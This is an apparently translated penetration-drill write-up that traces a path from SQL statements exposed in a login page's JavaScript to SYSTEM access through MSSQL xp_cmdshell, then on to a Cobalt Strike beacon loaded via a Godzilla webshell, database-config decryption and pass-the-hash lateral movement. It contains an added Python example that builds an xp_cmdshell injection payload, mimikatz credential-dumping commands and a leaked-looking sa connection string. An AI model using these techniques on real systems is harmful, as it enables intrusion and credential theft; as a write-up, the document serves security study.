
Title: A case of lateral movement from JS into the intranet


Foreword

Some time ago I took part in an offensive-defensive drill. After the conventional vulnerabilities had been used up, I remembered that many experts had shared articles on finding breakthroughs in JS, so I started with the JS and in the end opened an intranet entry point and obtained target permissions and personal information. I'm sharing the process here.

Statement: in this drill, all test equipment was provided by the organizer, all traffic was archived for audit, all operations were completed under authorization, and all data was securely destroyed after the drill ended.

Breaking through via JS

At the start there was only one login page; usernames could not be enumerated and a brute-force attempt failed.


Capturing the traffic with Burp Suite (bp) to look at the JS-related files showed that they contained SQL statements.


Tracing the comboxSQL variable showed that an action class was defined.


Searching for the path of this action class showed that it is accessed by splicing the path and parameters into the URL.


The path is spliced together and the parameters go straight into the SQL statement. Testing showed that the database was MSSQL, so system commands could be executed through xp_cmdshell.
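To make the injection step concrete, here is an added Python example (not code from the original post or from the target application) that mimics a query-string value being spliced straight into T-SQL, shows what a stacked xp_cmdshell payload turns the statement into, and puts the parameterised version beside it. The table and column names, the function names and the payload are all hypothetical/constructed; the T-SQL check at the top is the query a DBA runs to see whether xp_cmdshell is switched on.

```python
# Added example, not from the original post. Table/column names,
# function names and the payload are hypothetical/constructed.

# T-SQL a DBA runs to see whether xp_cmdshell is on (value_in_use = 1).
XP_CMDSHELL_CHECK = (
    "SELECT name, value_in_use FROM sys.configurations "
    "WHERE name = 'xp_cmdshell';"
)


def build_query_vulnerable(name):
    """Like the page's action class: the query-string value is spliced
    into the WHERE clause, so the input can rewrite the statement."""
    return "SELECT id, label FROM combo_items WHERE label = '" + name + "'"


def build_query_safe(name):
    """Same lookup with a bound parameter (pyodbc/pymssql-style '?'
    placeholder): the driver sends the value separately, never as SQL."""
    return "SELECT id, label FROM combo_items WHERE label = ?", (name,)


# Constructed attacker value: close the string, stack the statements that
# enable xp_cmdshell (needs sysadmin), run a command, comment out the tail.
PAYLOAD = (
    "';EXEC sp_configure 'show advanced options',1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;"
    "EXEC xp_cmdshell 'whoami';--"
)


def split_statements(sql):
    """Split on ';' outside single-quoted strings. MSSQL accepts stacked
    statements, so each piece here is something the server would run."""
    parts, cur, in_str = [], "", False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
        if ch == ";" and not in_str:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    if cur.strip():
        parts.append(cur.strip())
    return parts


def reaches_xp_cmdshell(sql):
    """True when one of the stacked statements calls xp_cmdshell."""
    return any(s.upper().startswith("EXEC XP_CMDSHELL")
               for s in split_statements(sql))


if __name__ == "__main__":
    bad = build_query_vulnerable(PAYLOAD)
    for stmt in split_statements(bad):
        print(stmt)
    print("xp_cmdshell reached:", reaches_xp_cmdshell(bad))
    sql, params = build_query_safe(PAYLOAD)
    print(sql, params)
```

With the spliced form the server sees seven statements, the sixth of which is the xp_cmdshell call; with the bound parameter the SQL text never changes and the whole payload travels as a string value.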


Bringing CS online with ShellcodeLoader

After command execution gave me SYSTEM privileges, I planned to download an AV-evading CS payload remotely and bring it online, but it did not launch successfully. I found that 360 Enterprise Security Cloud was present, and it intercepted the execution of the exe.


Change of approach: after downloading the Godzilla webshell, I used Godzilla's ShellcodeLoader function to load my own CS Trojan shellcode, and the beacon came online successfully.


Decrypting the database configuration

Because executing exe files was denied and they could not run, I searched the local configuration files and found the database account and password, but the database password was encrypted.


By searching historical website backup files I found that the system's early configuration files did not have database password encryption configured, and testing showed it was possible to connect to the database.

While looking for this system's database backup file, I happened to discover another business system deployed on the same server; the account, password and database IP in its database configuration file were also stored encrypted.


From its characteristics the system was identified as SiteServer CMS. Searching online, I found SiteServer CLI, this CMS's dedicated encryption/decryption tool.

After running it, the plaintext database configuration could be obtained as well:

Server=x.x.x.x;Uid=sa;Pwd=xxCSthink!@#123;Database=NEWdfgxxcs

Started a proxy and connected to the database through it; the test connection succeeded.


However, I also found that the database server could not execute exe programs: I could not run mimikatz to read the administrator hash, could not create a user, and could not upload Tscan for intranet scanning, so I was stuck here for a while. In the end I used the information-gathering function of a CS plugin to detect assets in the intranet segment.


The MS17-010 plugin attack failed.


Using proxychains together with msf to obtain permissions on a PC.

Using mimikatz to read the administrator password and enabling Remote Desktop, I found that it was impossible to log in.


Load the mimikatz (kiwi) module in msf and run:

#Get the debug privilege
privilege::debug

#Patch termsrv in memory so more than one RDP session is allowed
ts::multirdp

Gaining intranet permissions

Create a new user and log in to the personal PC.


Using this PC as a foothold, upload TideFinger and Tscan for intranet scanning. These two tools need a short introduction here.

TideFinger (Go version) fingerprint recognition:
1. Added fingerprints from Dismap, Vscan, Kscan, fofa, ServerScan and others.
2. Added ServerScan's non-web service fingerprints and optimized the goroutine concurrency of asset discovery.
3. The display borrows from Dismap; it should currently be among the best in efficiency and fingerprint coverage.


Tscan (Go version):
1. Tscan is an internal and external network asset scanning tool maintained jointly by the Tide security team.
2. The base code is iterated along with Fscan updates.
3. It is linked with the Chaosheng POC vulnerability detection platform: every month team members write POCs for recently disclosed vulnerabilities, regularly collect and organize POCs published on the Internet, and then update and release them.


After scanning the intranet segment, the next step was vulnerability verification. At a glance I found no hole that would give a shell directly, but the fingerprinting showed one intranet IP with port 2222 open running RMI.


Although I had obtained permissions on the server, no other relevant account or password information was found while gathering information on it.

Getting user hashes from the SAM file

I used mimikatz's sekurlsa::logonpasswords command to try to read the lsass process and obtain the password information of the currently logged-in users. The output showed no user information such as administrator (mainly because, when CS was used with this permission, the AV policy was presumably triggered and the server restarted). query user then showed that the administrator user was not online, so the administrator hash could not be read directly from memory. Instead, use mimikatz to read the hashes from the SAM file.

#Get the debug privilege

privilege::debug

#Elevate to SYSTEM

token::elevate

#Dump the SAM

lsadump::sam

Pass-the-hash

After getting the NTLM hash, I found that I could not directly recover the plaintext password from online sites. By passing the obtained NTLM hash I got permissions on four servers.


Next, log in to the servers with the hash and continue collecting information. On one of the servers I found a nested Remote Desktop session, and it led to a Windows Server 2003 system.


Obtaining the server password

Read this password with mimikatz (on systems without KB2871997, WDigest keeps the plaintext credential in LSASS, so mimikatz can grab the plaintext password directly):

* Username : Administrator

* Domain : WIN-LAOLOVGMF

* Password :
